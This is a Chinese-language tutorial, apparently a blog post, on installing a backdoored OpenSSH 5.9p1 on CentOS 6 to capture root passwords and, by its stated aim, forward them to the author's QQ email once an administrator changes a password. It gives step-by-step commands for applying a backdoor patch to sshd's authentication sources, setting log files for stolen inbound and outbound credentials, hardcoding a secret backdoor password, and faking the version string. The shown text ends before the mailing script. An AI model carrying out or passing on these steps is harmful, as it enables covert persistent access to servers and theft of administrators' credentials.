##自动劫持root密码并转发密码到邮箱
为什么要自动劫持root密码并转发密码到我的QQ邮箱?因为当你做黑客时,
你的弱鸡密码被修改后,我们希望可以收到管理员修改的密码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-O43VSS2g-1582105071942)(file:///C:\Users\DXJTAI~1\AppData\Local\Temp\ksohtml11660\wps2.jpg)]
我们要有个思路:在centos6上安装一个打了后门补丁的sshd服务,当用户来连接时,
直接把密码记录下来,然后使用脚本发到邮箱中
[root@localhost ~]# ssh -v 查看ssh版本
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
确认gcc是否安装
[root@localhost ~]# gcc -v 确认安装gcc
Using built-in specs.
gcc version 4.4.7 20120313 (Red Hat 4.4.7-17) (GCC)
[root@localhost ~]# yum -y install gcc 如何没有gcc就安装一下
上传
0x06-openssh-5.9p1.patch.tar.gz , openssh-5.9p1.tar.gz ,inotify-tools-3.13.tar.gz 到linux 的/tmp目录
[root@localhost tmp]# ll 传包到tmp目录下
total 1476
-rw-r--r--. 1 root root 3700 Feb 13 2020 0x06-openssh-5.9p1.patch.tar.gz
-rw-r--r--. 1 root root 389473 Feb 13 2020 inotify-tools-3.13.tar.gz
-rw-r--r--. 1 root root 1110014 Feb 13 2020 openssh-5.9p1.tar.gz
解压文件
[root@localhost tmp]# tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
[root@localhost tmp]# tar zxvf openssh-5.9p1.tar.gz
对openssh-5.9p1 打后门漏洞补丁
1.开始打补丁
[root@localhost tmp]# cp openssh-5.9p1.patch/sshbd5.9p1.diff 、openssh-5.9p1/
[root@localhost tmp]# cd openssh-5.9p1
[root@localhost openssh-5.9p1]# patch <sshbd5.9p1.diff #打补就修改或者替换原来的文件
文件:
patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.h
2.修改后门密码和记录root密码的文件夹目录
[root@localhost openssh-5.9p1]# vim /tmp/openssh-5.9p1/includes.h
进入找到
177 #define ILOG "/tmp/ilog" #记录登录到本机的用户名和密码
178 #define OLOG "/tmp/olog" #记录从本机登录到其他服务器上的用户名和密码
179 #define SECRETPW "apaajaboleh" #你后门密码
改为:
#define ILOG "/usr/share/ifile"
#define OLOG "/usr/share/ofile"
#define SECRETPW "zmedu"
安装后的sshd服务的版本号为:
[root@localhost ~]# ssh -v
OpenSSH_5.8p1 Debian-1ubuntu3p1, OpenSSL 1.0.0-fips 29 Mar 2010